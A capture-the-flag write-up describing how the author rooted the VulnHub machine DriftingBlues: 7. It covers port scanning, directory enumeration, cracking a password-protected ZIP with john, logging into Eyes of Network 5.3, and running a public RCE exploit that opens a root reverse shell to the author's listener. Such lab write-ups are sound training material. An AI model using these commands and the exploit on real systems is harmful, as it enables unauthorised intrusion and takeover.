DriftingBlues: 7 BOOT2ROOT CTF VULNHUB WRITEUP
Welcome back to another writeup! In this post, I’ll walk you through how I rooted the seventh box in the DriftingBlues series. We’re getting closer to the final machine—let’s dive in!
The first step, as usual, is running an Nmap scan to identify any open ports that might serve as our initial access point.
nmap -A -T5 192.168.172.110
There are several ports running HTTP services, which means plenty of possibilities to explore. The next step is to check out the webpage. Since HTTPS is available, it should automatically redirect us to the secure version instead of HTTP.
It's Eyes of Network! I have a good feeling about this, if the version of this is 5.3, it's an instant RCE.
What is Eyes Of Network?
Eyes of Network (EON) is an open-source IT infrastructure monitoring and management tool that combines several powerful tools like Nagios, Centreon, and Nagvis into a single platform. Designed for system and network administrators, EON provides real-time monitoring, performance graphs, alerting, and visualization of networks and servers, allowing users to detect issues quickly and maintain system uptime. It offers a web-based interface for easy configuration and status overview, making it a comprehensive solution for supervising both small and large-scale IT environments.
Since we don't have any credentials at the moment, we'll set that aside for now and explore the other ports. Let's take a look at Port 66—it stands out as unusual to me.
Clicking on each of the tabs at the top doesn’t trigger any redirection or changes—the page remains completely static.
This looks a bit suspicious, so I began enumerating subdirectories on this page. At the same time, I also started scanning for subdirectories on other HTTP services using dirsearch.
dirsearch -u http://192.168.172.110:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -e txt,php,html
After a while, a file was finally discovered on Port 66.
A file named eon discovered, so the next thing I did is to get it.
wget http://192.168.172.110:66/eon
Then check its content.
Looks Base64, now let's decode it.
echo "encoded_text" | base64 -d
This is the plaintext.
Aha! This appears to be a ZIP file—based on the initial bytes of its content, it starts with "PK", which is a well-known file signature (also called a magic number) for ZIP archives. This signature indicates that the file likely contains compressed data, and it's worth investigating further to see if it holds any useful information or credentials we can extract.
Next thing I did is to turn that Base64 encoded text to a file using Base64.guru .
Now that we have the ZIP file, let's unzip it.
unzip application.zip
It has a password, now let's crack it. Let's convert the zip file to a hash first.
zip2john application.zip > hash
Now let's crack it using john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
And..
We now have the password, now let's unzip it again!
We've now successfully retrieved the creds.txt file.
A username and a password. This might be the credential for the EON, let's try!
It worked—we’ve gained access! Now, let’s check what version of EON is this.
Just as I suspected—it’s version 5.3! This version is known to be vulnerable to Remote Code Execution (RCE)!
As you can see, there's so many exploits available for this version, haha! But we’ll be using the last one!
searchsploit -m php/webapps/48025.txt
Now that we’ve obtained the exploit, we’ll convert it into a Python file, as it’s originally written in Python.
mv 48025.txt exploit.py
Now let's run the exploit!
We're all set!
python3 exploit.py https://192.168.172.110 -ip 192.168.172.246 -port 1234 -user admin -password <REDACTED>
We’re in! And if you notice the shell prompt showing a hash symbol (#), that means we’ve already gained root access!
We've successfully pwned DriftingBlues: 7!!!
This box is really simple actually, nothing's new... Now time for the final box!! Stay tuned!!
Last updated